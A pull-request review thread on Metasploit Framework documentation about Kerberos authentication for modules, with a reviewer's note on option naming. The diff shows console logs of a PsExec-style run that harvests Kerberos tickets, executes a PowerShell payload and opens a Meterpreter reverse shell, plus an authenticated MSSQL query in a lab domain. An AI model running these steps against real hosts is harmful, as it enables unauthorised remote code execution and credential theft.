docs/metasploit-framework.wiki/kerberos/service_authentication.md

```diff
@@ -0,0 +1,256 @@
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.123.13:445 - Connecting to the server...
+[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
+[*] 192.168.123.13:445 - Selecting PowerShell target
+[*] 192.168.123.13:445 - Executing the payload...
+[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (175686 bytes) to 192.168.123.13
+[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000
+
+meterpreter >
+```
+
+Connect to a Microsoft SQL Server instance and run a query:
+
+```
+msf6 > use auxiliary/admin/mssql/mssql_sql
+msf6 auxiliary(admin/mssql/mssql_sql) > rerun 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssqlauth=kerberos mssqlrhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+[*] Reloading module...
+[*] Running module against 192.168.123.13
+
+[*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response
+[+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response
+[*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin
+[*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid
+[*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193)
+
+ auth_scheme
+ -----------
+ KERBEROS
+
+[*] Auxiliary module execution completed
+```
+
+### Options
+
+Kerberos authentication requires additional options to be set. Some of them are prefixed with the protocol the module
+is authenticating. For example, the PSexec module which operates over SMB would use the "SMB" prefix.
+
+Required options:
+* `$PrefixAuth` -- The authentication modes this module supports. Set it to "kerberos" to use Kerberos authentication.
+* `$PrefixRhostname` -- The hostname of the target system. This value should be either the hostname `WIN-MIJZ318SQH` or
+  the FQDN like `WIN-MIJZ318SQH.msflab.local`.
+* `$PrefixDomain` -- The domain name of the target system, e.g. `msflab.local`.
```

Comment:
I think using brace-expansion-like syntax would be more clear. Also, adding some examples will help to clarify the concept.
```suggestion
* `${Prefix}Auth` -- The authentication modes this module supports. Set it to "kerberos" to use Kerberos authentication.
* `${Prefix}Rhostname` -- The hostname of the target system. This value should be either the hostname `WIN-MIJZ318SQH` or
  the FQDN like `WIN-MIJZ318SQH.msflab.local`.
* `${Prefix}Domain` -- The domain name of the target system, e.g. `msflab.local`.
```

Reply:
I've updated to use this syntax, I've also added inline examples, and I've added a quick reference/example list above for winrm/mssql/etc before this section